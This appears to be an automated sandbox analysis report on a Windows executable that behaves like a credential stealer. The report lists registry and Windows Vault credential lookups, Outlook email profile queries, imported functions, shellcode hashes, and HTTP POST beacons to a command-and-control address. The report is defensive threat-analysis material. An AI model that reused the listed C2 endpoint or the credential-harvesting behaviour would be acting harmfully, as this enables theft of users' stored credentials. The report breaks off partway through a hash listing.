HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
lpk.dll.LpkEditControl
kernel32.dll.GetDiskFreeSpaceExA
oleaut32.dll.VariantChangeTypeEx
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarAdd
oleaut32.dll.VarSub
oleaut32.dll.VarMul
oleaut32.dll.VarDiv
oleaut32.dll.VarIdiv
oleaut32.dll.VarMod
oleaut32.dll.VarAnd
oleaut32.dll.VarOr
oleaut32.dll.VarXor
oleaut32.dll.VarCmp
oleaut32.dll.VarI4FromStr
oleaut32.dll.VarR4FromStr
oleaut32.dll.VarR8FromStr
oleaut32.dll.VarDateFromStr
oleaut32.dll.VarCyFromStr
oleaut32.dll.VarBoolFromStr
oleaut32.dll.VarBstrFromCy
oleaut32.dll.VarBstrFromDate
oleaut32.dll.VarBstrFromBool
user32.dll.GetMonitorInfoA
user32.dll.GetSystemMetrics
user32.dll.EnumDisplayMonitors
user32.dll.AnimateWindow
comctl32.dll.InitializeFlatSB
comctl32.dll.UninitializeFlatSB
comctl32.dll.FlatSB_GetScrollProp
comctl32.dll.FlatSB_SetScrollProp
comctl32.dll.FlatSB_EnableScrollBar
comctl32.dll.FlatSB_ShowScrollBar
comctl32.dll.FlatSB_GetScrollRange
comctl32.dll.FlatSB_GetScrollInfo
comctl32.dll.FlatSB_GetScrollPos
comctl32.dll.FlatSB_SetScrollPos
comctl32.dll.FlatSB_SetScrollInfo
comctl32.dll.FlatSB_SetScrollRange
user32.dll.SetLayeredWindowAttributes
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptReleaseContext
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultEnumerateVaults
vaultcli.dll.VaultFree
vaultcli.dll.VaultGetItem
vaultcli.dll.VaultOpenVault
vaultcli.dll.VaultCloseVault
sechost.dll.LookupAccountSidLocalW
netapi32.dll.NetUserGetInfo
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptSetKeyParam
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptDestroyKey
"C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe"
C:\Windows\system32\lsass.exe
56BC56B24CFE6F2024462707
VaultSvc

PE Information

Image Base 0x00400000
Entry Point 0x0047d348
Reported Checksum 0x00000000
Actual Checksum 0x000b19c3
Minimum OS Version 4.0
Compile Time 1991-12-10 04:36:50
Import Hash 1bf3dfb307ebfa8bd4824f38b5f9c06c

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
CODE 0x00001000 0x0007c390 0x0007c400 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.60
DATA 0x0007e000 0x0000139c 0x00001400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.10
BSS 0x00080000 0x00000c05 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.idata 0x00081000 0x00002468 0x00002600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.91
.tls 0x00084000 0x00000010 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rdata 0x00085000 0x00000018 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 0.21
.reloc 0x00086000 0x0000873c 0x00008800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 6.63
.rsrc 0x0008f000 0x00024a24 0x00024c00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 7.09

Imports

Library kernel32.dll:
0x481164 VirtualFree
0x481168 VirtualAlloc
0x48116c LocalFree
0x481170 LocalAlloc
0x481174 GetVersion
0x481178 GetCurrentThreadId
0x481184 VirtualQuery
0x481188 WideCharToMultiByte
0x48118c MultiByteToWideChar
0x481190 lstrlenA
0x481194 lstrcpynA
0x481198 LoadLibraryExA
0x48119c GetThreadLocale
0x4811a0 GetStartupInfoA
0x4811a4 GetProcAddress
0x4811a8 GetModuleHandleA
0x4811ac GetModuleFileNameA
0x4811b0 GetLocaleInfoA
0x4811b4 GetCommandLineA
0x4811b8 FreeLibrary
0x4811bc FindFirstFileA
0x4811c0 FindClose
0x4811c4 ExitProcess
0x4811c8 WriteFile
0x4811d0 RtlUnwind
0x4811d4 RaiseException
0x4811d8 GetStdHandle
Library user32.dll:
0x4811e0 GetKeyboardType
0x4811e4 LoadStringA
0x4811e8 MessageBoxA
0x4811ec CharNextA
Library advapi32.dll:
0x4811f4 RegQueryValueExA
0x4811f8 RegOpenKeyExA
0x4811fc RegCloseKey
Library oleaut32.dll:
0x481204 SysFreeString
0x481208 SysReAllocStringLen
0x48120c SysAllocStringLen
Library kernel32.dll:
0x481214 TlsSetValue
0x481218 TlsGetValue
0x48121c LocalAlloc
0x481220 GetModuleHandleA
Library advapi32.dll:
0x481228 RegQueryValueExA
0x48122c RegOpenKeyExA
0x481230 RegCloseKey
Library kernel32.dll:
0x481238 lstrcpyA
0x48123c lstrcmpA
0x481240 WriteFile
0x481244 WaitForSingleObject
0x481248 VirtualQuery
0x48124c VirtualProtect
0x481250 VirtualAlloc
0x481254 SleepEx
0x481258 Sleep
0x48125c SizeofResource
0x481260 SetThreadLocale
0x481264 SetFilePointer
0x481268 SetEvent
0x48126c SetErrorMode
0x481270 SetEndOfFile
0x481274 ResetEvent
0x481278 ReadFile
0x48127c MulDiv
0x481280 LockResource
0x481284 LoadResource
0x481288 LoadLibraryA
0x481294 GlobalUnlock
0x481298 GlobalReAlloc
0x48129c GlobalHandle
0x4812a0 GlobalLock
0x4812a4 GlobalFree
0x4812a8 GlobalFindAtomA
0x4812ac GlobalDeleteAtom
0x4812b0 GlobalAlloc
0x4812b4 GlobalAddAtomA
0x4812b8 GetVersionExA
0x4812bc GetVersion
0x4812c0 GetTickCount
0x4812c4 GetThreadLocale
0x4812c8 GetSystemInfo
0x4812cc GetStringTypeExA
0x4812d0 GetStdHandle
0x4812d4 GetProcAddress
0x4812d8 GetModuleHandleA
0x4812dc GetModuleFileNameA
0x4812e0 GetLocaleInfoA
0x4812e4 GetLocalTime
0x4812e8 GetLastError
0x4812ec GetFullPathNameA
0x4812f0 GetFileAttributesA
0x4812f4 GetDiskFreeSpaceA
0x4812f8 GetDateFormatA
0x4812fc GetCurrentThreadId
0x481300 GetCurrentProcessId
0x481304 GetCPInfo
0x481308 GetACP
0x48130c FreeResource
0x481310 InterlockedExchange
0x481314 FreeLibrary
0x481318 FormatMessageA
0x48131c FindResourceA
0x481320 FindFirstFileA
0x481324 FindClose
0x481330 EnumCalendarInfoA
0x48133c CreateThread
0x481340 CreateFileA
0x481344 CreateEventA
0x481348 CompareStringA
0x48134c CloseHandle
Library version.dll:
0x481354 VerQueryValueA
0x48135c GetFileVersionInfoA
Library gdi32.dll:
0x481364 UnrealizeObject
0x481368 StretchBlt
0x48136c SetWindowOrgEx
0x481370 SetWindowExtEx
0x481374 SetWinMetaFileBits
0x481378 SetViewportOrgEx
0x48137c SetViewportExtEx
0x481380 SetTextColor
0x481384 SetStretchBltMode
0x481388 SetROP2
0x48138c SetPixel
0x481390 SetMapMode
0x481394 SetEnhMetaFileBits
0x481398 SetDIBColorTable
0x48139c SetBrushOrgEx
0x4813a0 SetBkMode
0x4813a4 SetBkColor
0x4813a8 SelectPalette
0x4813ac SelectObject
0x4813b0 SelectClipRgn
0x4813b4 SaveDC
0x4813b8 RestoreDC
0x4813bc Rectangle
0x4813c0 RectVisible
0x4813c4 RealizePalette
0x4813c8 Polyline
0x4813cc Polygon
0x4813d0 PolyPolyline
0x4813d4 PlayEnhMetaFile
0x4813d8 PatBlt
0x4813dc MoveToEx
0x4813e0 MaskBlt
0x4813e4 LineTo
0x4813e8 IntersectClipRect
0x4813ec GetWindowOrgEx
0x4813f0 GetWinMetaFileBits
0x4813f4 GetTextMetricsA
0x481400 GetStockObject
0x481404 GetPixel
0x481408 GetPaletteEntries
0x48140c GetObjectA
0x481418 GetEnhMetaFileBits
0x48141c GetDeviceCaps
0x481420 GetDIBits
0x481424 GetDIBColorTable
0x481428 GetDCOrgEx
0x481430 GetClipBox
0x481434 GetBrushOrgEx
0x481438 GetBitmapBits
0x48143c ExtTextOutA
0x481440 ExtCreatePen
0x481444 ExcludeClipRect
0x481448 DeleteObject
0x48144c DeleteEnhMetaFile
0x481450 DeleteDC
0x481454 CreateSolidBrush
0x481458 CreatePenIndirect
0x48145c CreatePalette
0x481464 CreateFontIndirectA
0x481468 CreateDIBitmap
0x48146c CreateDIBSection
0x481470 CreateCompatibleDC
0x481478 CreateBrushIndirect
0x48147c CreateBitmap
0x481480 CopyEnhMetaFileA
0x481484 BitBlt
Library user32.dll:
0x48148c CreateWindowExA
0x481490 WindowFromPoint
0x481494 WinHelpA
0x481498 WaitMessage
0x48149c ValidateRect
0x4814a0 UpdateWindow
0x4814a4 UnregisterClassA
0x4814a8 UnionRect
0x4814ac UnhookWindowsHookEx
0x4814b0 TranslateMessage
0x4814b8 TrackPopupMenu
0x4814c0 ShowWindow
0x4814c4 ShowScrollBar
0x4814c8 ShowOwnedPopups
0x4814cc ShowCursor
0x4814d0 SetWindowsHookExA
0x4814d4 SetWindowTextA
0x4814d8 SetWindowPos
0x4814dc SetWindowPlacement
0x4814e0 SetWindowLongA
0x4814e4 SetTimer
0x4814e8 SetScrollRange
0x4814ec SetScrollPos
0x4814f0 SetScrollInfo
0x4814f4 SetRect
0x4814f8 SetPropA
0x4814fc SetParent
0x481500 SetMenuItemInfoA
0x481504 SetMenu
0x481508 SetKeyboardState
0x48150c SetForegroundWindow
0x481510 SetFocus
0x481514 SetCursor
0x481518 SetClipboardData
0x48151c SetClassLongA
0x481520 SetCapture
0x481524 SetActiveWindow
0x481528 SendMessageA
0x48152c ScrollWindowEx
0x481530 ScrollWindow
0x481534 ScreenToClient
0x481538 RemovePropA
0x48153c RemoveMenu
0x481540 ReleaseDC
0x481544 ReleaseCapture
0x481550 RegisterClassA
0x481554 RedrawWindow
0x481558 PtInRect
0x48155c PostQuitMessage
0x481560 PostMessageA
0x481564 PeekMessageA
0x481568 OpenClipboard
0x48156c OffsetRect
0x481570 OemToCharA
0x481574 MessageBoxA
0x481578 MessageBeep
0x48157c MapWindowPoints
0x481580 MapVirtualKeyA
0x481584 LoadStringA
0x481588 LoadKeyboardLayoutA
0x48158c LoadIconA
0x481590 LoadCursorA
0x481594 LoadBitmapA
0x481598 KillTimer
0x48159c IsZoomed
0x4815a0 IsWindowVisible
0x4815a4 IsWindowEnabled
0x4815a8 IsWindow
0x4815ac IsRectEmpty
0x4815b0 IsIconic
0x4815b4 IsDialogMessageA
0x4815b8 IsChild
0x4815bc IsCharAlphaNumericA
0x4815c0 IsCharAlphaA
0x4815c4 InvalidateRect
0x4815c8 IntersectRect
0x4815cc InsertMenuItemA
0x4815d0 InsertMenuA
0x4815d4 InflateRect
0x4815dc GetWindowTextA
0x4815e0 GetWindowRect
0x4815e4 GetWindowPlacement
0x4815e8 GetWindowLongA
0x4815ec GetWindowDC
0x4815f0 GetTopWindow
0x4815f4 GetSystemMetrics
0x4815f8 GetSystemMenu
0x4815fc GetSysColorBrush
0x481600 GetSysColor
0x481604 GetSubMenu
0x481608 GetScrollRange
0x48160c GetScrollPos
0x481610 GetScrollInfo
0x481614 GetPropA
0x481618 GetParent
0x48161c GetWindow
0x481620 GetMessageTime
0x481624 GetMenuStringA
0x481628 GetMenuState
0x48162c GetMenuItemInfoA
0x481630 GetMenuItemID
0x481634 GetMenuItemCount
0x481638 GetMenu
0x48163c GetLastActivePopup
0x481640 GetKeyboardState
0x481648 GetKeyboardLayout
0x48164c GetKeyState
0x481650 GetKeyNameTextA
0x481654 GetIconInfo
0x481658 GetForegroundWindow
0x48165c GetFocus
0x481660 GetDoubleClickTime
0x481664 GetDlgItem
0x481668 GetDesktopWindow
0x48166c GetDCEx
0x481670 GetDC
0x481674 GetCursorPos
0x481678 GetCursor
0x48167c GetClipboardData
0x481680 GetClientRect
0x481684 GetClassNameA
0x481688 GetClassInfoA
0x48168c GetCaretPos
0x481690 GetCapture
0x481694 GetActiveWindow
0x481698 FrameRect
0x48169c FindWindowA
0x4816a0 FillRect
0x4816a4 EqualRect
0x4816a8 EnumWindows
0x4816ac EnumThreadWindows
0x4816b4 EndPaint
0x4816b8 EnableWindow
0x4816bc EnableScrollBar
0x4816c0 EnableMenuItem
0x4816c4 EmptyClipboard
0x4816c8 DrawTextA
0x4816cc DrawMenuBar
0x4816d0 DrawIconEx
0x4816d4 DrawIcon
0x4816d8 DrawFrameControl
0x4816dc DrawFocusRect
0x4816e0 DrawEdge
0x4816e4 DispatchMessageA
0x4816e8 DestroyWindow
0x4816ec DestroyMenu
0x4816f0 DestroyIcon
0x4816f4 DestroyCursor
0x4816f8 DeleteMenu
0x4816fc DefWindowProcA
0x481700 DefMDIChildProcA
0x481704 DefFrameProcA
0x481708 CreatePopupMenu
0x48170c CreateMenu
0x481710 CreateIcon
0x481714 CloseClipboard
0x481718 ClientToScreen
0x48171c CheckMenuItem
0x481720 CallWindowProcA
0x481724 CallNextHookEx
0x481728 BeginPaint
0x48172c CharNextA
0x481730 CharLowerBuffA
0x481734 CharLowerA
0x481738 CharUpperBuffA
0x48173c CharToOemA
0x481740 AdjustWindowRectEx
Library kernel32.dll:
0x48174c Sleep
Library oleaut32.dll:
0x481754 SafeArrayPtrOfIndex
0x481758 SafeArrayGetUBound
0x48175c SafeArrayGetLBound
0x481760 SafeArrayCreate
0x481764 VariantChangeType
0x481768 VariantCopy
0x48176c VariantClear
0x481770 VariantInit
Library ole32.dll:
0x481778 CoTaskMemAlloc
0x48177c CoCreateInstance
0x481780 CoUninitialize
0x481784 CoInitialize
Library comctl32.dll:
0x481794 ImageList_Write
0x481798 ImageList_Read
0x4817a8 ImageList_DragMove
0x4817ac ImageList_DragLeave
0x4817b0 ImageList_DragEnter
0x4817b4 ImageList_EndDrag
0x4817b8 ImageList_BeginDrag
0x4817bc ImageList_Remove
0x4817c0 ImageList_DrawEx
0x4817c4 ImageList_Replace
0x4817c8 ImageList_Draw
0x4817d8 ImageList_Add
0x4817e0 ImageList_Destroy
0x4817e4 ImageList_Create
0x4817e8 InitCommonControls
Library comdlg32.dll:
0x4817f0 GetOpenFileNameA
Library kernel32.dll:
0x4817f8 MulDiv

This file is not on VirusTotal.

Process Tree


ThGUgOMMWUNV0z.exe, PID: 1520, Parent PID: 1512
Full Path: C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe
Command Line: "C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe"
ThGUgOMMWUNV0z.exe, PID: 932, Parent PID: 1520
Full Path: C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe
Command Line: "C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe"
services.exe, PID: 464, Parent PID: 376
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
lsass.exe, PID: 568, Parent PID: 464
Full Path: C:\Windows\sysnative\lsass.exe
Command Line: C:\Windows\system32\lsass.exe

Hosts

Direct IP Country Name
Y 107.175.150.73 United States

TCP

Source Source Port Destination Destination Port
192.168.35.24 49171 107.175.150.73 80
192.168.35.24 49173 107.175.150.73 80
192.168.35.24 49176 107.175.150.73 80
192.168.35.24 49177 107.175.150.73 80
192.168.35.24 49178 107.175.150.73 80
192.168.35.24 49179 107.175.150.73 80
192.168.35.24 49180 107.175.150.73 80
192.168.35.24 49181 107.175.150.73 80
192.168.35.24 49182 107.175.150.73 80
192.168.35.24 49183 107.175.150.73 80
192.168.35.24 49184 107.175.150.73 80
192.168.35.24 49185 107.175.150.73 80
192.168.35.24 49186 107.175.150.73 80
192.168.35.24 49187 107.175.150.73 80

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

URI Data
http://107.175.150.73/~giftioz/.mojoli/fre.php
POST /~giftioz/.mojoli/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 107.175.150.73
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 35F61B7C
Content-Length: 206
Connection: close

http://107.175.150.73/~giftioz/.mojoli/fre.php
POST /~giftioz/.mojoli/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 107.175.150.73
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 35F61B7C
Content-Length: 179
Connection: close

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name 6F2024.lck
Associated Filenames
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
File Size 1 bytes
File Type very short file (no magic)
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
CRC32 83DCEFB7
Ssdeep 3:U:U
ClamAV None
Yara None matched
CAPE Yara None matched
File name 6F2024.exe
Associated Filenames
C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
File Size 710656 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 ce41fb6da97d5c9fd57d6dd28ccb3d38
SHA1 80c3f9968ecdc33d817040c781e075a19a681cdf
SHA256 8b6a8a1d17b72868327d74827784df0b51617d28876f0c0951d262ba340ed5a4
CRC32 934C8265
Ssdeep 12288:M6w6OiTNMrC2ZT0vuIvQDNDq8JP8R3HGTtspmYzVMYW3w2Pg67sCKIpEINHLOJmT:MiTTMC2V6ADFSm68YV1wU+VNyJK
ClamAV None
Yara None matched
CAPE Yara None matched
Type Extracted Shellcode
Size 4096 bytes
Virtual Address 0x003F0000
Process ThGUgOMMWUNV0z.exe
PID 1520
Path C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe
MD5 441b7d4c495abb5e02fd47f9014b3bce
SHA1 f8fa3c1147619d7cc62696b6df69c3d8854cb017
SHA256 772aa62e45bf09499da378504e676cdcc332ad3b54f404278e002e51f7702296
CRC32 B5E923A5
Ssdeep 3:ttHNx/NySly:ttLg
Yara None matched
CAPE Yara None matched
Type Extracted Shellcode: 32-bit executable
Size 563712 bytes
Virtual Address 0x00310000
Process ThGUgOMMWUNV0z.exe
PID 1520
Path C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe
MD5 4fa0291ad86ed270421d77627074b9b8
SHA1 2f2258d323f0a044ee68a100eed2a41eaf6e46a6
SHA256 6e772cfee8ed120d4a3314b3a3229359c632522e92531322d2b0ef84c97bda50
CRC32 EF2ED9F3
Ssdeep 12288:36w6OiTNMrC2ZT0vuIvQDNDq8JP8R3HGTtspmYzVT7YW3w:3iTTMC2V6ADFSm6n3YV
Yara None matched
CAPE Yara None matched
Type Extracted Shellcode
Size 4096 bytes
Virtual Address 0x00310000
Process ThGUgOMMWUNV0z.exe
PID 1520
Path C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe
MD5 83f6df595befd72908535400ca3d05ca
SHA1 97de6092811baac87930f219fcdc3482738b5e48
